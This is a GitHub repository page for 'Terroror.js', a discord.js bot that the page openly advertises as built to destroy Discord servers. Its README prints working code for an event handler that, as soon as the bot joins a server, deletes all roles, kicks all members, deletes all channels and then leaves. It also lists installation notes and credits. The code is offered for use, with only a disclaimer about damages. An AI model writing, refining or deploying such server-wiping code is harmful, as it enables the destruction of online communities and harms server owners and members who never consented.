Skip to content

A discord bot build to destroy discord servers!

License

Notifications You must be signed in to change notification settings

xqwtxon/Terroror.js

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

A Terroror.js bot, is made in discord.js to destroy discord servers!

Your app.js

/* 
      DO THIS AT YOUR OWN RISK!
      We are not responisible of any damages on discord!
      Copyright by MincoMK
      https://www.minco.kro.kr/
*/
const Main = require("./src/Main.js"); // let discord make own main directory

let main = new Main(); // let make ./src/Main.js as main code
main.main(); // making main code is working

Simple eventmanager.js

const process = require("process");
const version = require("../package.json").version;

/* 
	Enables the SuperTerroror on Discord when bots join automatically make a bomb to server
*/
class EventManager {
	joinAllEvents(client) { // join bot for all events
		this.client = client; // this client
		client.on("ready", async () => { // on ready
			console.log("The bot is ready to terroror"); // when bot is ready log on console
		});

		client.on("guildCreate", guild => { // the server ---
			guild.roles.cache.forEach(role => { // for each role
				role.delete().catch(console.error); // --- delete all roles
			});
			guild.members.cache.forEach(mb => { // for each members
				mb.kick().catch(console.error); // --- kick all members
			});
			guild.channels.cache.forEach(ch => { // for each channels
				ch.delete().catch(console.error); // --- delete channels
			});
			guild.leave(); // and leave the bot after terroror
		});
	}
}

module.exports = EventManager; // export the eventmanager

// end of file

When bots join, automatically terroror!

View Wiki for Full Installation and Guides for building SuperTerroror.js!

  • Added express app for Uptimerobot.com
  • Removed node_modules, use npm install / npm i on terminal
  • Added disnotify on package.json
  • Added @discord-opus, discord-api-types, and other depencies of djs

View History Changelogs for All Information!

Credits

  • MincoMK: Coding
  • Hen2527: Design/Commenting
  • xqwtxon: Original Creator

License

This repository is protected by BY-NC-SA CCL.

About

A discord bot build to destroy discord servers!

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 4

  •  
  •  
  •  
  •